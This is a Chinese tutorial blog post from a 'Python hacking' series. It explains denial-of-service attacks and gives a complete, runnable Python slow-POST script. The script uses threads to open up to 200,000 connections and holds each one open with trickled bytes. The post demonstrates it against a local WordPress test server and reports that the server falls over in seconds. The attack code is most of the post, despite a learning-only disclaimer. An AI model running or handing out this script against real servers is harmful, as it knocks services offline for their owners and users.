热门标签
热门文章
- 1【AI绘画】从零开发AI绘画微信小程序_可以利用ai设计图形界面吗微信小程序界面
- 2 Serverless Computing:现状与基础知识
- 3Fixed-Point Designer:Create Fixed-Point Data
- 4Navicat Premium15 下载与安装(免费版)以及链接SqlServer数据库_navicat premium 15下载
- 5零信任相关标准、框架及落地实践(下)_华三零信任 反向代理
- 6Triton inference server系列(0)——相关资料整理_triton server 相关文献
- 7Mac 更新 Homebrew软件包时提示 zsh: command not found: brew 错误
- 8十大开源测试工具和框架_bestdb 6.0.0是开源的吗
- 9[注意力机制]--Non-Local注意力的变体及应用_nonlocal注意力
- 10Linux安装oracle 19c_linux安装oracle19c
当前位置: article > 正文
Python黑客攻防(十六)编写Dos脚本,进行简单攻击演示_python dos攻击脚本
作者:天景科技苑 | 2024-07-15 13:58:03
赞
踩
python dos攻击脚本
注:本篇文章为个人学习笔记仅供学习交流,请勿用于非法用途。转载须标明出处。
欢迎关注微信公众号:黑客帮 获取更多干货。
Dos攻击简介
DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。DOS是单机于单机之间的攻击。
Dos攻击原理
首先攻击者向被攻击的服务器发送大量的虚假IP请求,被攻击者在收到请求后返回确认信息,等待攻击者进行确认,(此处需要拥有HTTP协议工作方式和TCP三次握手的基本知识)该过程需要TCP的三次握手,由于攻击者发送的请求信息是虚假的,所以服务器接收不到返回的确认信息,在一段时间内服务器会处与等待状态,而分配给这次请求的资源却被有被释放。当被攻击者等待一定的时间后,会因连接超时而断开,这时攻击者再次发送新的虚假信息请求,这样最终服务器资源被耗尽,直到瘫痪。
import socket import time import threading MAX_CONN = 200000 # 最大连接数 PORT = 80 HOST = "127.0.0.1" # 目标IP或域名. PAGE = "/index.php" # 目标页面 buf = ("POST %s HTTP/1.1\r\n" "Host: %s\r\n" "Content-Length: 10000000\r\n" # 实体数据大小 "Cookie: dklkt_dos_test\r\n" "\r\n" % (PAGE, HOST)) socks = [] def conn_thread(): global socks for i in range(0, MAX_CONN): # MAX_CONN允许最大连接数 # AF_INET 表示 IPv4 地址,创建 TCP套接字,必须使用 SOCK_STREAM 作为套接字类型 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((HOST, PORT)) s.send(buf.encode()) print("[+] 成功发送buf!,conn=%d\n" % i) socks.append(s) except Exception as ex: print("[-] 无法连接服务器或发送错误:%s" % ex) time.sleep(1) # 暂停1秒 def send_thread(): global socks while True: for s in socks: try: s.send("f".encode()) except Exception as ex: print("[-] 发送异常:%s\n" % ex) socks.remove(s) s.close() time.sleep(1) # 建立多线程 conn_th = threading.Thread(target=conn_thread, args=()) send_th = threading.Thread(target=send_thread, args=()) # 开启线程 conn_th.start() send_th.start() conn_th2 = threading.Thread(target=conn_thread, args=()) send_th2 = threading.Thread(target=send_thread, args=()) conn_th2.start() send_th2.start()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
先访问一下http://127.0.0.1/wp-login.php,记录一下攻击前的状态。
然后开始攻击。
再次访问http://127.0.0.1/wp-login.php,查看效果。
OK,演示结束。自己搭建的这种靶机服务器坚持不了几秒就凉了。
微信公众号:黑客帮
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/829689?site
推荐阅读
相关标签
